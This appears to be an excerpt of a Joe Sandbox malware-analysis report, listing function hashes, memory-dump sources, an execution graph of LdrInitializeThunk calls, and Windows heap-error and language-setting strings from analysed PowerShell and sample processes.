                                                • Instruction ID: 2577e074b3b1344a486accb14555dbb0fc1d96b8c049de93fe02d78d2d47a50d
                                                • Opcode Fuzzy Hash: 4d6869a55a527177f71c1477d65727e0201003755542984e62ac9aeb7c738a48
                                                • Instruction Fuzzy Hash: 4D713070A02248DFDF14DFA5D494BADB7F6BF88304F148429D402AB754DB75AD46CB90
                                                Function 07B22125 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d4b4a41dd5d798223b3455edf19ab346ba6a69901a42c424ea2f883caa140fc
                                                • Instruction ID: e0ec56c653fe516ec6b013137fa0841c3769ffa682c6658f711b8ea047304b9f
                                                • Opcode Fuzzy Hash: 7d4b4a41dd5d798223b3455edf19ab346ba6a69901a42c424ea2f883caa140fc
                                                • Instruction Fuzzy Hash: 17417EF1B0122097EB1057B8D811AFEB792EFC6215B1181EAD649DF351CA32C913D763
                                                Function 07B23E00 Relevance: .1, Instructions: 124COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 706a01e26d1029aa2764dc0e57d9ca9a44c4e4fdb7f8b156dc324d26d5423ecd
                                                • Instruction ID: a00689c1d1ef25c0b302bd25f4d67fb484847cb568aab49ce2beefc3b10a8adf
                                                • Opcode Fuzzy Hash: 706a01e26d1029aa2764dc0e57d9ca9a44c4e4fdb7f8b156dc324d26d5423ecd
                                                • Instruction Fuzzy Hash: 174159F2B01225ABEB20AB69D8402BBB7F5EFC5210B1085AAC949D7205DB35D906D7E1
                                                Function 04C97A5B Relevance: .1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07f5ae2a95db48cecdd9feaef3a4e5b9a7bb3cfcf0c8e6823cb23921b97b5dae
                                                • Instruction ID: 09e6c7edfe29ce4348ca296e936f0abbf33e38e4b53c446559cad01c91c8fc65
                                                • Opcode Fuzzy Hash: 07f5ae2a95db48cecdd9feaef3a4e5b9a7bb3cfcf0c8e6823cb23921b97b5dae
                                                • Instruction Fuzzy Hash: 25419070A02208DFDB18DFA5D894AEDBBF2BF89310F14842DD005AB764DB75AD45CB80
                                                Function 04C9D680 Relevance: .1, Instructions: 119COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25d3adec926444e418563342968b77707c4aa849e91a5406743609975ebba532
                                                • Instruction ID: 0c7b0d98ab786581f1f52ee9d403bc6a2b4821645234b78734fe42c405369fe2
                                                • Opcode Fuzzy Hash: 25d3adec926444e418563342968b77707c4aa849e91a5406743609975ebba532
                                                • Instruction Fuzzy Hash: 6F41F134A00204DFDB18DB79C494BAEBAF7AF89310F14C469D906AB795DB75AC418BA0
                                                Function 098520B8 Relevance: .1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3116309034.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 635caa22f605da57e2756557aaeba9c4ed0977c16f75e572f10ce2abe70d7828
                                                • Instruction ID: 49ef414f5a117d83ec154227f8d20874c895996e93427b0d378f1ccd6f89c9b2
                                                • Opcode Fuzzy Hash: 635caa22f605da57e2756557aaeba9c4ed0977c16f75e572f10ce2abe70d7828
                                                • Instruction Fuzzy Hash: EF41F974A01509DFCB05CF9CC994AAEB7B1FF88320B258258EA25E73A4D735EC51CB90
                                                Function 098516D7 Relevance: .1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3116309034.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9f7a4c1d6ba526ed40db3cc3cc3204c59af1be19f177961e89c04cb9a31aae7
                                                • Instruction ID: 78c92afb11de7ad26a021faa594c1dc6d5f7d63eb544de7171934d9607054a2c
                                                • Opcode Fuzzy Hash: f9f7a4c1d6ba526ed40db3cc3cc3204c59af1be19f177961e89c04cb9a31aae7
                                                • Instruction Fuzzy Hash: EC410A74A01609DFCB15CF9CC884AAEBBB2FF49314B248259E916E73A4D735EC51CB90
                                                Function 09851111 Relevance: .1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3116309034.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5d2b82cf362368742faa0b0cf560798e5a765968d345642e1d8a42935132091
                                                • Instruction ID: 88c33a9f225ece7ba2edf5f88e8e83e9d5673f79842f8ea6bc629cd58148802f
                                                • Opcode Fuzzy Hash: e5d2b82cf362368742faa0b0cf560798e5a765968d345642e1d8a42935132091
                                                • Instruction Fuzzy Hash: BB413B34A05209DFCB14CF9CC984AAEB7B2FF88324B248658E915E73A4D731EC41CB90
                                                Function 04C92BB0 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2379d07a3650b15d1edd91d453bf17552ba3697f24d5e1e8ade26a43bac3cd4
                                                • Instruction ID: e11a3f2b4e70f6a89aa4c5c3714c0945b74b194e29384884a49ede886dd1f56b
                                                • Opcode Fuzzy Hash: e2379d07a3650b15d1edd91d453bf17552ba3697f24d5e1e8ade26a43bac3cd4
                                                • Instruction Fuzzy Hash: E7416974A00205EFCB05CF59C598AAAFBF2FF48310B158A99D945AB764C736FD50CBA0
                                                Function 07B28000 Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff7516f405ed177e19f5583b50b23487fb8acb4170831e6dc0154e318894c343
                                                • Instruction ID: e6aa8121c23e53a11b7da517d6b12c3d09f32cc7de67256371cbb79525877e38
                                                • Opcode Fuzzy Hash: ff7516f405ed177e19f5583b50b23487fb8acb4170831e6dc0154e318894c343
                                                • Instruction Fuzzy Hash: 78318D74B00214ABE7049BA4C855FAF7BA3EF85364F108418EA556F791CE76AC42CBA1
                                                Function 07B2862C Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3105149579.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7b20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c84af611819ea7d5774a0623f1e939f132c01f80c0a42f53abf7829dee5341e1
                                                • Instruction ID: e43caf9b04c410a90e905a57f55038c1443300cb8a8288f0c6d47a1b68909bb1
                                                • Opcode Fuzzy Hash: c84af611819ea7d5774a0623f1e939f132c01f80c0a42f53abf7829dee5341e1
                                                • Instruction Fuzzy Hash: 31318EF63043228BFF215A6494153BAB7A2CBC2251F0484BBD559CB290DF39C983D7A2
                                                Function 09861C29 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3116376312.0000000009860000.00000040.00000800.00020000.00000000.sdmp, Offset: 09860000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9860000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a5354e2c40011b5fe3d3062c63aa788d0add54765ab0b601b0fdaff09d1c538
                                                • Instruction ID: dc10e4cef06cae3e9b30cd4f6258f409cc0930b4e9a2e979ff0e7e779a487457
                                                • Opcode Fuzzy Hash: 7a5354e2c40011b5fe3d3062c63aa788d0add54765ab0b601b0fdaff09d1c538
                                                • Instruction Fuzzy Hash: DB21CE35A08209DFDF248E55D589A69B3B2BF65361F14816EE514CF372CB32E851CB81
                                                Function 09861C8A Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3116376312.0000000009860000.00000040.00000800.00020000.00000000.sdmp, Offset: 09860000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9860000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6e020dfcd9a7ff37d0368f7b24ad95853455063b49167cf71bf02e38b8ac074
                                                • Instruction ID: 1fb1a1c51262742423612dd132b754b58e47b8484ecf2d66e5e3065de94cd36a
                                                • Opcode Fuzzy Hash: e6e020dfcd9a7ff37d0368f7b24ad95853455063b49167cf71bf02e38b8ac074
                                                • Instruction Fuzzy Hash: 93212930A08209DFDB248E5AD189A6AB7B5BB65351F14816EE408CF336DB35E881CB91
                                                Function 04C9A99B Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1eb871326583a577dc15d4366b55db775a5fbc93250fbbad59f00fa6a61f8f40
                                                • Instruction ID: 00f1b6a061bc3083b2fece1cc8fd844bb5da5f2b654c5f7413689b343cc3c61b
                                                • Opcode Fuzzy Hash: 1eb871326583a577dc15d4366b55db775a5fbc93250fbbad59f00fa6a61f8f40
                                                • Instruction Fuzzy Hash: 3C014478B00218DFDB04DB98D4906ADF7B5FF8D310B258269D55A97361C635AC439B50
                                                Function 0985041D Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3116309034.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 993599ce3b6d6dc14216c099cf697958a7eb3989f0114bd2d8d2f5a7b910d865
                                                • Instruction ID: b343d65bfd2b471d5c27f78e290cacb588873c3dd61e7211a7b4b7d933f7c56c
                                                • Opcode Fuzzy Hash: 993599ce3b6d6dc14216c099cf697958a7eb3989f0114bd2d8d2f5a7b910d865
                                                • Instruction Fuzzy Hash: 57014931D093895FC7009B79E8115DF7FB5EF42220F0641BBD840DF283DA69580AC791
                                                Function 04C9F510 Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1fa36d2bfb5781f2329c92bf9ff68de238a3c5ab7381e380d1af0f5368b34955
                                                • Instruction ID: daee64953d0b3f9593211c88df9eadb56844967e42d3f953046a05edc7437212
                                                • Opcode Fuzzy Hash: 1fa36d2bfb5781f2329c92bf9ff68de238a3c5ab7381e380d1af0f5368b34955
                                                • Instruction Fuzzy Hash: 5801D1797182504F8B06AB3CA46886EBBE3FFCA632315005EE443CB752DE689C128751
                                                Function 04C9F520 Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 414a4d7e8d97b981b028133eee8739e3ceb1e9dbd21673d2492e8980f78a729f
                                                • Instruction ID: cd5592a5b1a8e3386df4e8095aa09f8bfef0908c6fa79cb9796d00bc06418d7e
                                                • Opcode Fuzzy Hash: 414a4d7e8d97b981b028133eee8739e3ceb1e9dbd21673d2492e8980f78a729f
                                                • Instruction Fuzzy Hash: 1AF090393041108B87097B2CE46842EB7E7FFC9632310401EE907C7751EF799C228791
                                                Function 0985087E Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3116309034.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a35ad66772045e34ffe0fcf11ac724617a31ea04e1752275bc5e2154f4eb6e75
                                                • Instruction ID: 40eabfb332a1c5036ee7fe0aa1061cc56198513fd4f987fbb481d2a7b32d1740
                                                • Opcode Fuzzy Hash: a35ad66772045e34ffe0fcf11ac724617a31ea04e1752275bc5e2154f4eb6e75
                                                • Instruction Fuzzy Hash: BBF09031A00205EFCF14CF98D8819AEF776FB88320B24825DD919A7655CB36AC53CB80
                                                Function 04C97795 Relevance: .0, Instructions: 24COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0bd66eee383030397cc1b5f67edabe788a0ac2b851eb62de0cb9535aa570cadf
                                                • Instruction ID: 9ca1b6743f3378647ac601167295b1914b56c79a93b4f79c80ed80d2e4753a27
                                                • Opcode Fuzzy Hash: 0bd66eee383030397cc1b5f67edabe788a0ac2b851eb62de0cb9535aa570cadf
                                                • Instruction Fuzzy Hash: 88F01C34B0120ADBEB04DBA4D5A5BAF7BB2AB44304F148528D2029F394DA78AD458BC0
                                                Function 04C9FDCA Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc12bd5c824840a31e5ecea91a42a602b495051ea1f83d46757efb722eec8c9f
                                                • Instruction ID: 61c33d7f3e6b4ffab6ad96c5dfb247a6fd63a4b88638d9f8b3416ad2bff5b28a
                                                • Opcode Fuzzy Hash: fc12bd5c824840a31e5ecea91a42a602b495051ea1f83d46757efb722eec8c9f
                                                • Instruction Fuzzy Hash: E1E04F71D04209AF8740DFA9D54156DFFF4AB59210B24C8AE8908E7211EA319A52CBD1
                                                Function 04C9FDD8 Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3098818159.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_4c90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                • Instruction ID: 2579d6dbd3aedbd796795232a9d201d29a37e68a0c19e358d3966794b849dba2
                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                • Instruction Fuzzy Hash: C9D06270D042099F8780DFADC94156DFBF4EB59200F5485AE8919D7301F7315A128BD1

                                                Execution Graph

                                                Execution Coverage:0%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:100%
                                                Total number of Nodes:1
                                                Total number of Limit Nodes:0
                                                execution_graph 82516 1fdb2b60 LdrInitializeThunk

                                                Executed Functions

                                                Function 1FDB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3 1fdb35c0-1fdb35cc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 11b63c6e031e77a7b63225c36faa81548ae2a2bcd01d9ce8c45f24e7601febc7
                                                • Instruction ID: dd00b8142233f1d632c8e7ccb1a4e97a90c670b5ea57cfc04b5f30028716aae4
                                                • Opcode Fuzzy Hash: 11b63c6e031e77a7b63225c36faa81548ae2a2bcd01d9ce8c45f24e7601febc7
                                                • Instruction Fuzzy Hash: A090023160650402D640B1594515B1A100947D0211FA5C415B0428738D87968A5165A2
                                                Function 1FDB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2 1fdb2df0-1fdb2dfc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 95c953eb647897f997278c62a3541021b66bdbec345a68302fb0ac2e2af96ca9
                                                • Instruction ID: 662f0b3c74c4fc1e26800f9acbaebedebdcce4786a441776b82ce15e1d469e48
                                                • Opcode Fuzzy Hash: 95c953eb647897f997278c62a3541021b66bdbec345a68302fb0ac2e2af96ca9
                                                • Instruction Fuzzy Hash: AE90023120240413D651B1594505B1B000D47D0251FD5C416B0428728D96578A52A121
                                                Function 1FDB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1 1fdb2c70-1fdb2c7c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2658af87c5ebd52321e458fec36bd1b62d1f27fbb3d0a01832d41371b605b34c
                                                • Instruction ID: 5f95951a00b4ce8ab143e39245dd6e4e8e2214f26c36281c77ad1d16d689bbd2
                                                • Opcode Fuzzy Hash: 2658af87c5ebd52321e458fec36bd1b62d1f27fbb3d0a01832d41371b605b34c
                                                • Instruction Fuzzy Hash: 1D90023120248802D650B1598405B5E000947D0311F99C415B4428728D869689917121
                                                Function 1FDB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 1fdb2b60-1fdb2b6c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 968160fce169c7f9e8a322090a5dcc64dc1ef26ba4880ddc198a7580dbe0864a
                                                • Instruction ID: d9248db9bec74af8710ec03faf61c60ae21c2db179e0851f4d66e91f2616664c
                                                • Opcode Fuzzy Hash: 968160fce169c7f9e8a322090a5dcc64dc1ef26ba4880ddc198a7580dbe0864a
                                                • Instruction Fuzzy Hash: 17900261203400034645B1594415A2A400E47E0211B95C025F1018760DC52689916125

                                                Non-executed Functions

                                                Function 1FE2FCAB Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 97 1fe2fcab-1fe2fcc3 GetPEB 98 1fe2fce2-1fe2fce3 call 1fd6b970 97->98 99 1fe2fcc5-1fe2fce0 GetPEB call 1fd6b970 97->99 103 1fe2fce8-1fe2fd0a call 1fd6b970 98->103 99->103 106 1fe2fd81-1fe2fd8a GetPEB 103->106 107 1fe2fd0c 103->107 124 1fe2fda9-1fe2fdaa call 1fd6b970 106->124 125 1fe2fd8c-1fe2fda7 GetPEB call 1fd6b970 106->125 108 1fe2fd60-1fe2fd65 107->108 109 1fe2fd21-1fe2fd26 107->109 110 1fe2fd67-1fe2fd6c 107->110 111 1fe2fd44-1fe2fd49 107->111 112 1fe2fd4b-1fe2fd50 107->112 113 1fe2fd28-1fe2fd2d 107->113 114 1fe2fd6e-1fe2fd73 107->114 115 1fe2fd2f-1fe2fd34 107->115 116 1fe2fd52-1fe2fd57 107->116 117 1fe2fd13-1fe2fd18 107->117 118 1fe2fd36-1fe2fd3b 107->118 119 1fe2fd75-1fe2fd7a 107->119 120 1fe2fd1a-1fe2fd1f 107->120 121 1fe2fd59-1fe2fd5e 107->121 122 1fe2fd7c 107->122 123 1fe2fd3d-1fe2fd42 107->123 108->106 109->106 110->106 111->106 112->106 113->106 114->106 115->106 116->106 117->106 118->106 119->106 120->106 121->106 122->106 123->106 129 1fe2fdaf-1fe2fdca call 1fd6b970 124->129 125->129 132 1fe2fdcc-1fe2fdd5 GetPEB 129->132 133 1fe2fe0d-1fe2fe13 129->133 134 1fe2fdd7-1fe2fdf2 GetPEB call 1fd6b970 132->134 135 1fe2fdf4-1fe2fdf5 call 1fd6b970 132->135 136 1fe2fe56-1fe2fe5c 133->136 137 1fe2fe15-1fe2fe1e GetPEB 133->137 148 1fe2fdfa-1fe2fe0c call 1fd6b970 134->148 135->148 142 1fe2fe5e-1fe2fe67 GetPEB 136->142 143 1fe2fe9f-1fe2fea5 136->143 140 1fe2fe20-1fe2fe3b GetPEB call 1fd6b970 137->140 141 1fe2fe3d-1fe2fe3e call 1fd6b970 137->141 157 1fe2fe43-1fe2fe55 call 1fd6b970 140->157 141->157 146 1fe2fe86-1fe2fe87 call 1fd6b970 142->146 147 1fe2fe69-1fe2fe84 GetPEB call 1fd6b970 142->147 150 1fe2fea7-1fe2fead 143->150 151 1fe2feaf-1fe2feb8 GetPEB 143->151 167 1fe2fe8c-1fe2fe9e call 1fd6b970 146->167 147->167 148->133 150->151 152 1fe2fef7-1fe2ff00 GetPEB 150->152 153 1fe2fed7-1fe2fed8 call 1fd6b970 151->153 154 1fe2feba-1fe2fed5 GetPEB call 1fd6b970 151->154 165 1fe2ff02-1fe2ff1d GetPEB call 1fd6b970 152->165 166 1fe2ff1f-1fe2ff20 call 1fd6b970 152->166 169 1fe2fedd-1fe2fef4 call 1fd6b970 153->169 154->169 157->136 177 1fe2ff25-1fe2ff3a call 1fd6b970 165->177 166->177 167->143 169->152
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                • API String ID: 0-2897834094
                                                • Opcode ID: 96780e3bc4355e47dc8eb0e78c8d1bff544b12b5a337fefa22c8a51fd7422cfe
                                                • Instruction ID: 64842318c9bae83a10efe6942e1f138ad3985107742e20f36f36b2368e0212d7
                                                • Opcode Fuzzy Hash: 96780e3bc4355e47dc8eb0e78c8d1bff544b12b5a337fefa22c8a51fd7422cfe
                                                • Instruction Fuzzy Hash: 3E610C376126C4DFD381AB54CC88F7173E5EB47730B99406BE8005B7A1EA35AC868F91
                                                Function 1FE15910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                Download Yara Rule
                                                Strings
                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1FE15FE1
                                                • LanguageConfigurationPending, xrefs: 1FE16221
                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 1FE15A84
                                                • @, xrefs: 1FE1647A
                                                • @, xrefs: 1FE163A0
                                                • PreferredUILanguagesPending, xrefs: 1FE161D2
